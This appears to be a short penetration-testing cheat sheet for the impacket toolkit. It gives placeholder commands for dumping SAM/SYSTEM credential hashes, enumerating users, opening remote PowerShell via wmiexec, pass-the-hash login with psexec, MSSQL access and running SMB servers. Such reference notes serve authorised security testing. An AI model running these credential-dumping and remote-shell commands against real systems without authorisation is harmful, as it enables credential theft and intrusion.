impacket
impacket (12.4k β) is a collection of python classes for working with network protocols. They are already installed on Kali:
$ impacket-secretsdump # secretsdump.py
$ ...
You may install them manually too:
$ sudo git clone https://github.com/fortra/impacket /opt/impacket
$ cd /opt/impacket
$ pip install -r requirements.txt
$ pip install .
$ python /opt/impacket/examples/secretsdump.py [...]
Samrdump
List users and domains.
$ impacket-samrdump IP
$ impacket-samrdump username:password@IP
wmiexec
Pop a powershell or run commands using DCOM:
$ impacket-wmiexec -shell-type powershell username:password@IP
$ impacket-wmiexec -shell-type powershell username:password@IP "hostname"
mssqlclient
Connect to a MSSQL database.
$ impacket-mssqlclient username@IP -windows-auth
$ impacket-mssqlclient username:password@IP -windows-auth
SQL> exit
Dump hashes from backup
Dump hashes from a backup of SAM and SYSTEM hashes. There are local credentials and domain cached credentials.
$ impacket-secretsdump -sam XXX -system YYY LOCAL
$ impacket-secretsdump -sam XXX -security XXX -system XXX LOCAL
<output format is explained in the output>
PsExec
Use a hash to login (Pass-The-Hash).
$ impacket-psexec -hashes usernamehash:sessionhash username@IP
$ impacket-psexec -hashes :hash username@IP
SMB server
Run a SMB server to which user will connect with the username XXX and the password YYY. Files will be stored in /path/to/share
.
$ impacket-smbserver -smb2support -username XXX -password YYY share_name /path/to/share
$ impacket-smbserver -smb2support share_name /path/to/share
SMB Client
Alternative to smbclient
. It works even when the former doesn't.
$ impacket-smbclient 'username':'password'@IP
$ impacket-smbclient IP
# shares
<list of shares>
# use <sharename>
# ls
# tree